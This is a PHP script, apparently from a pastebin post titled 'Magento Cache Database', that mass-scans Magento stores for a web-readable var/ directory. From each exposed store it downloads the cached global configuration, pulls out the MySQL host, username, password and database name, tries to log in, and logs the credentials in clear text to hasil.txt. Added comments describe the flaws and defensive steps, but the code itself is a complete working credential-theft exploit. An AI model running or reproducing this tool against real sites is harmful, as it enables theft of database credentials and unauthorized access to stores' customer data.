YKBlackHat

Magento Cache Database

Nov 17th, 2017
  1. <?php
  2. # Change the author name don't make you become a coder
  3. # @2017 FathurFreakz
/**
 * Thin wrapper around a single cURL handle that keeps the last response,
 * its parsed headers/cookies and the last error on public properties.
 *
 * Review notes on what the visible code does:
 *  - The constructor turns CURLOPT_SSL_VERIFYPEER off, so the peer
 *    certificate is not validated against a CA and HTTPS responses are
 *    not authenticated.
 *  - The cookie jar is a file under "<cwd>/cookie/" named md5(time()),
 *    i.e. a name derived only from the current second.
 *  - request() returns before its cleanup code when $debug is false, so the
 *    same handle (and any options set on it) is reused by later calls.
 */
class curl {
    // cURL handle created in the constructor.
    public $curl;
    // When true, request() var_dump()s debug() instead of returning the body.
    public $debug = false;
    // Body of the last response (headers stripped) after request().
    public $result;
    // 'code' / 'msg' from curl_errno() / curl_error() of the last request.
    public $error = array();
    // Parsed outgoing request headers of the last request (see parseHeader()).
    public $requestheader;
    // Parsed response headers of the last request (see parseHeader()).
    public $responseheader;
    // Filesystem path of the cookie jar set by setCookiePath().
    public $cookiepath;
    // Cookies parsed from Set-Cookie lines of the last response.
    public $responsecookie;
    // Cookies queued through setCookie().
    public $requestcookie;
    // Extra request headers as name => value, applied by setRequestHeader().
    public $headers = array();
    // Not read or written anywhere in the visible code.
    public $referer;
    // NOTE(review): setOption() writes to $this->options (plural), which is
    // not declared; this declared property is never used in the visible code.
    public $option = array();
    // HTTP status code of the last response.
    public $httpcode;
    // Effective URL of the last request (after any followed redirects).
    public $lasturl;
    // Scratch array filled and returned by debug().
    public $debugvar = array();
    // Default transfer timeout in seconds, applied in the constructor.
    public $timeout = 30;


    /**
     * Create the cURL handle and apply the default options.
     *
     * Side effects: sets the script's default timezone to Asia/Jakarta and
     * points the cookie jar at "<cwd>/cookie/<md5(time())>".
     */
    function __construct(){
        date_default_timezone_set("Asia/Jakarta");
        $this->curl = curl_init();
        // Cookie-jar name comes from the current timestamp only.
        $this->setCookiePath(md5(time()));
        // Fixed User-Agent string claiming to be Mobile Safari on iOS 8.3.
        $this->setUserAgent("Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4");
        // Response headers are included in curl_exec() output; request()
        // splits them off again using CURLINFO_HEADER_SIZE.
        $this->setOption(CURLOPT_HEADER, true);
        // Needed so curl_getinfo(..., CURLINFO_HEADER_OUT) returns the sent headers.
        $this->setOption(CURLINFO_HEADER_OUT, true);
        $this->setOption(CURLOPT_RETURNTRANSFER, true);
        $this->setOption(CURLOPT_FOLLOWLOCATION, true);
        $this->setOption(CURLOPT_TIMEOUT, $this->timeout);
        // Certificate chain validation is switched off: any certificate,
        // including a self-signed one, is accepted for HTTPS targets.
        $this->setOption(CURLOPT_SSL_VERIFYPEER, false);
        $this->setOption(CURLOPT_SSL_VERIFYHOST, 2);
    }

    /**
     * Set one cURL option on the handle and remember the value.
     *
     * @param int   $option CURLOPT_* constant.
     * @param mixed $value  Value for that option.
     * @return bool Result of curl_setopt().
     */
    function setOption($option, $value) {
        // Stores into $this->options, not the declared $this->option.
        $this->options[$option] = $value;
        return curl_setopt($this->curl, $option, $value);
    }

    /**
     * Collect error, request/response headers, last URL and body of the
     * last request into $debugvar.
     *
     * @return array The populated $debugvar array.
     */
    function debug(){
        $this->debugvar['DEBUG_ERROR'] = $this->error;
        $this->debugvar['DEBUG_REQUEST_HEADERS'] = $this->requestheader;
        $this->debugvar['DEBUG_RESPONSE_HEADERS'] = $this->responseheader;
        $this->debugvar['DEBUG_LAST_URL'] = $this->lasturl;
        $this->debugvar['DEBUG_RESULT'] = $this->result;
        return $this->debugvar;
    }

    /**
     * Queue an extra request header for the next request().
     *
     * @param string $key   Header name.
     * @param string $value Header value.
     */
    function setHeader($key,$value){
        $this->headers[$key] = $value;
    }

    /**
     * Perform one HTTP request and record its outcome on the object.
     *
     * @param string             $method HTTP method name.
     * @param string             $url    Request URL.
     * @param array|string|false $var    Optional body; arrays are URL-encoded.
     * @return string|null Response body when $debug is false; nothing is
     *                     returned when $debug is true (the debug array is
     *                     var_dump()ed instead).
     */
    function request($method,$url,$var = false){
        // A non-empty $var is sent as CURLOPT_POSTFIELDS whatever the method is.
        if(!empty($var)){
            $data = (is_array($var) ? http_build_query($var, '', '&') : $var);
            $this->setOption(CURLOPT_POSTFIELDS,$data);
        }
        if(!empty($this->headers) && is_array($this->headers)){
            $this->setRequestHeader();
        }
        $this->setMethod($method);
        $this->setOption(CURLOPT_URL,$url);
        // The return value of curl_exec() is not checked here; a failure is
        // only visible afterwards through $this->error.
        $this->result = curl_exec($this->curl);
        $this->error['code'] = curl_errno($this->curl);
        $this->error['msg'] = curl_error($this->curl);
        $this->httpcode = curl_getinfo($this->curl, CURLINFO_HTTP_CODE);
        $this->lasturl = curl_getinfo($this->curl, CURLINFO_EFFECTIVE_URL);
        $this->requestheader = $this->parseHeader(curl_getinfo($this->curl, CURLINFO_HEADER_OUT));
        // CURLOPT_HEADER is on, so the first $header_size bytes are headers.
        $header_size = curl_getinfo($this->curl, CURLINFO_HEADER_SIZE);
        $this->responsecookie = $this->parseCookie(substr($this->result, 0, $header_size));
        $this->responseheader = $this->parseHeader(substr($this->result, 0, $header_size));
        $this->result = substr($this->result, $header_size);
        if($this->debug == true){
            var_dump($this->debug());
        } else {
            // Returning here skips the cleanup below, so the handle stays
            // open and keeps its method/body options for the next call.
            return $this->result;
        }
        // Reached only in debug mode: resets the method options, then closes
        // the handle and deletes the cookie jar.
        $this->unsetMethod($method);
        $this->unsetCurl();
    }

    /**
     * Turn the queued name => value headers into "Name: value" lines and
     * hand them to cURL as CURLOPT_HTTPHEADER.
     */
    function setRequestHeader(){
        $headers = array();
        foreach ($this->headers as $key => $value) {
            $headers[] = $key.': '.$value;
        }
        $this->setOption(CURLOPT_HTTPHEADER, $headers);
    }



    /**
     * Parse a raw header block into a name => value array.
     *
     * Only lines of the form "Name:value<CR>" match; a repeated header name
     * overwrites the earlier value, and the captured value keeps whatever
     * follows the colon (including a leading space).
     *
     * @param string $response Raw header text.
     * @return array|false Parsed headers, or false when nothing matched.
     */
    function parseHeader($response){
        if (!preg_match_all('/([A-Za-z\-]{1,})\:(.*)\\r/', $response, $matches) || !isset($matches[1], $matches[2])){
            return false;
        }
        $headers = [];
        foreach ($matches[1] as $index => $key){
            $headers[$key] = $matches[2][$index];
        }
        return $headers;
    }

    /**
     * Configure the handle for the given HTTP method.
     *
     * The method is compared upper-cased, but the caller's original spelling
     * is what gets passed to CURLOPT_CUSTOMREQUEST.
     *
     * @param string $method HTTP method name.
     */
    function setMethod($method){
        switch (strtoupper($method)){
            case 'HEAD':
                $this->setOption(CURLOPT_CUSTOMREQUEST, $method);
                $this->setOption(CURLOPT_NOBODY, true);
                break;
            case 'GET':
                $this->setOption(CURLOPT_CUSTOMREQUEST, $method);
                $this->setOption(CURLOPT_HTTPGET, true);
                break;
            case 'POST':
                $this->setOption(CURLOPT_CUSTOMREQUEST, $method);
                $this->setOption(CURLOPT_POST, true);
                break;
            default:
                $this->setOption(CURLOPT_CUSTOMREQUEST, $method);
        }
    }

    /** Drop all queued request headers. */
    function unsetHeader(){
        $this->headers = array();
    }

    /** Close the cURL handle and delete the cookie jar file. */
    function unsetCurl(){
        curl_close($this->curl);
        $this->unsetCookie();
    }

    /** Delete the cookie jar file if it exists on disk. */
    function unsetCookie(){
        if(file_exists($this->cookiepath)){
            unlink($this->cookiepath);
        }
    }

    /**
     * Undo the per-request options applied by setMethod()/request().
     *
     * @param string $method The method that was used for the request.
     */
    function unsetMethod($method){
        $this->unsetHeader();
        $this->setOption(CURLOPT_URL, false);
        $this->setOption(CURLOPT_CUSTOMREQUEST, null);
        switch (strtoupper($method)) {
            case 'HEAD':
                $this->setOption(CURLOPT_NOBODY, false);
                break;
            case 'POST':
                $this->setOption(CURLOPT_POST, false);
                $this->setOption(CURLOPT_POSTFIELDS, false);
                break;
        }
    }

    /**
     * Point both the cookie jar and the cookie file at
     * "<cwd>/cookie/<name>". The "cookie" directory is not created here.
     *
     * @param string $name File name inside the "cookie" directory.
     */
    function setCookiePath($name){
        $path = getcwd(). DIRECTORY_SEPARATOR . "cookie" . DIRECTORY_SEPARATOR . $name;
        $this->setOption(CURLOPT_COOKIEJAR, $path);
        $this->setOption(CURLOPT_COOKIEFILE, $path);
        $this->cookiepath = $path;
    }

    /**
     * Queue one cookie (or an array of cookies) for outgoing requests.
     *
     * Only the single-cookie branch pushes the queued cookies to the handle
     * via CURLOPT_COOKIE; the array branch just stores them.
     *
     * @param string|array $key   Cookie name, or an array of name => value.
     * @param mixed        $value Cookie value when $key is a name.
     */
    function setCookie($key, $value = false){
        if(is_array($key)){
            foreach($key as $set => $cookie){
                $this->requestcookie[$set] = $cookie;
            }
        } else {
            $this->requestcookie[$key] = $value;
            // http_build_query() URL-encodes names and values before joining with "; ".
            $this->setOption(CURLOPT_COOKIE, http_build_query($this->requestcookie, '', '; '));
        }
    }


    /**
     * Extract the name=value part of every Set-Cookie line in a header block.
     *
     * @param string $header Raw response headers.
     * @return array Cookie name => value, later cookies overriding earlier ones.
     */
    function parseCookie($header){

        preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $header, $matches);
        $cookies = array();
        foreach($matches[1] as $item) {
            // parse_str() decodes the pair as if it were a query string.
            parse_str($item, $cookie);
            $cookies = array_merge($cookies, $cookie);
        }
        return $cookies;
    }


    /**
     * Set the transfer timeout.
     *
     * @param mixed $int Timeout in seconds; passed through intval().
     */
    function setTimeout($int) {
        $this->setOption(CURLOPT_TIMEOUT, intval($int));
    }

    /** Shorthand for request("POST", ...). */
    function post($url,$var = false){
        return $this->request("POST",$url,$var);
    }

    /** Shorthand for request("GET", ...). */
    function get($url,$var = false){
        return $this->request("GET",$url,$var);
    }

    /** Shorthand for request("PUT", ...). */
    function put($url,$var = false){
        return $this->request("PUT",$url,$var);
    }

    /** Shorthand for request("HEAD", ...). */
    function head($url,$var = false){
        return $this->request("HEAD",$url,$var);
    }

    /** Shorthand for request("DELETE", ...). */
    function delete($url,$var = false){
        return $this->request("DELETE",$url,$var);
    }

    /** Set the User-Agent header sent with requests. */
    public function setUserAgent($ua){
        $this->setOption(CURLOPT_USERAGENT, $ua);
    }
    /** Set the Referer header sent with requests. */
    public function setReferer($referer){
        $this->setOption(CURLOPT_REFERER, $referer);
    }
    /** Route requests through the given proxy, treated as SOCKS5. */
    public function setSocks($socks){
        $this->setOption(CURLOPT_PROXY, $socks);
        $this->setOption(CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
    }

    /**
     * Return the first substring found between two delimiters.
     *
     * Both delimiters are concatenated into the pattern as-is, so they are
     * interpreted as regular-expression source, not as literal text.
     *
     * @param string $start  Opening delimiter (regex fragment).
     * @param string $end    Closing delimiter (regex fragment).
     * @param string $string Text to search.
     * @return string|false First captured substring, or false if none.
     */
    function getString($start,$end,$string){
        preg_match_all("/" . $start . "(.*?)" . $end . "/sm",$string,$result);
        return (isset($result[1][0]) ? $result[1][0] : false);
    }
}
  225.  
/**
 * Checks a list of Magento sites for a web-readable var/ directory and, where
 * the cached global configuration can be downloaded, reads the database
 * connection settings out of it and tries them against MySQL.
 *
 * Defensive reading of the visible code:
 *  - Both requests only return content when the store's var/ directory is
 *    served by the web server. Denying web access to var/ (and app/etc)
 *    removes the exposure this class depends on.
 *  - A store that answered these requests should treat its database
 *    credentials as disclosed and rotate them.
 *  - database() can only report "Success" when the MySQL server accepts
 *    connections from outside, so restricting database network access
 *    limits the impact of a leaked configuration.
 *  - Detection signal: access-log entries for "/var/resource_config.json"
 *    and "/var/cache/mage--2/mage---*_CONFIG_GLOBAL", sent with the fixed
 *    iPhone User-Agent set by the parent constructor.
 */
class Cache extends curl{
    // Not referenced anywhere in the visible code.
    private $db = array('host','username','password','dbname');
    // Connection fields extracted by getVar(); also written out by saved().
    private $tmp = array();

    /** Delegates to the parent constructor; adds nothing of its own. */
    function __construct(){
        parent::__construct();
    }

    /**
     * Pull the <host>, <username>, <password> and <dbname> element contents
     * out of the downloaded configuration text.
     *
     * @param string $content Downloaded cache-file contents.
     * @return array Keys host/username/password/dbname; a value is false
     *               when the element was not found.
     */
    function getVar($content){
        $this->tmp['host'] = $this->getString("<host>","<\/host>",$content);
        $this->tmp['username'] = $this->getString("<username>","<\/username>",$content);
        $this->tmp['password'] = $this->getString("<password>","<\/password>",$content);
        $this->tmp['dbname'] = $this->getString("<dbname>","<\/dbname>",$content);
        return $this->tmp;

    }

    /**
     * Try to open a MySQL connection with the extracted settings.
     *
     * @param string $host   Host value taken from the configuration.
     * @param string $user   Database user.
     * @param string $pass   Database password.
     * @param string $name   Database name.
     * @param string $domain The target string, used when $host is not an IP.
     * @return string "Success" or "Failed".
     */
    function database($host,$user,$pass,$name,$domain){
        // `!` binds tighter than `===`, so this is true exactly when
        // filter_var() returned a (truthy) valid IP address.
        if (!filter_var($host, FILTER_VALIDATE_IP) === false) {
            $ip = $host;
        } else {
            $ip = $domain;
        }

        // `@` hides connection warnings; only the truthiness of the result is used.
        $connect = @mysqli_connect($ip,$user,$pass,$name);
        if(!$connect){
            return "Failed";
        } else {
            return "Success";
            // Unreachable: the connection is never closed explicitly.
            mysqli_close($connect);
        }
    }

    /**
     * Run the two-step check against one target and print the outcome.
     *
     * @param string $target Base URL of the site; paths are appended as-is.
     * @return void Results are echoed and, when the configuration was
     *              readable, appended to the log via saved().
     */
    function cache($target){
        $resource_config = $this->get($target."/var/resource_config.json");
        if(preg_match("/media_directory/i",$resource_config)){
            $parse_json = json_decode($resource_config);
            // The cache-file prefix is the first three hex digits of the MD5
            // of the media_directory path with 'media' swapped for 'app/etc'.
            $md5 = substr(md5(str_replace('media','app/etc',$parse_json->media_directory)),0,3);
            $config_global = $this->get($target."/var/cache/mage--2/mage---".$md5."_CONFIG_GLOBAL");
            // 'backend_forgotpassword' is used as the marker that the response
            // really is the cached configuration.
            if(preg_match('/backend_forgotpassword/',$config_global)){
                    $database = $this->getVar($config_global);
                    $status = $this->database($database['host'],$database['username'],$database['password'],$database['dbname'],$target);
                    if($status == "Success"){
                        echo $target."VULN\n";
                    } else {
                        echo $target."CAN'T CONNECT DB\n";
                    }
                    // Logged whether or not the connection attempt succeeded.
                    $this->saved($target,$status);
            } else {
                echo $target."/var/cache/mage--2/mage---".$md5."_CONFIG_GLOBAL => CONFIG_GLOBAL NOT FOUND\n";
            }
        } else {
            echo $target."/var/resource_config.json => RESOURCE_CONFIG NOT FOUND\n";
        }

    }

    /**
     * Append the target, every extracted field and the connection status to
     * hasil.txt in the current directory.
     *
     * The extracted password is written in clear text; the fopen() result is
     * not checked.
     *
     * @param string $target   Target that was checked.
     * @param string $response Status string returned by database().
     */
    function saved($target,$response){
        $f = fopen('hasil.txt','a+');
        fwrite($f, $target."\n");
        foreach($this->tmp as $data => $value){
            fwrite($f, $data." : ".$value."\n");
        }
        fwrite($f,"MysqlConnect : $response\n");
        fclose($f);
    }

    /**
     * Read a newline-separated target list and run cache() on each entry.
     *
     * @param string $file Path to the list file; the script exits if it is missing.
     */
    function execute($file){
        if(!file_exists($file)){
            die($file . " not found !\n");
        } else {
            $file = explode("\n",file_get_contents($file));
            $no = 0;
            foreach($file as $target){
                // cache() returns nothing, so only the "[n/total] " prefix is
                // added here; cache() prints its own result line first.
                echo "[".$no."/".count($file)."] ".$this->cache(rtrim($target));
                $no++;
            }
        }
    }
}
  306. $x = new Cache;
  307. if(isset($argv[1]) && !empty($argv[1])){
  308.     $x->execute($argv[1]);
  309. } else {
  310.     die("INVALID");
  311. }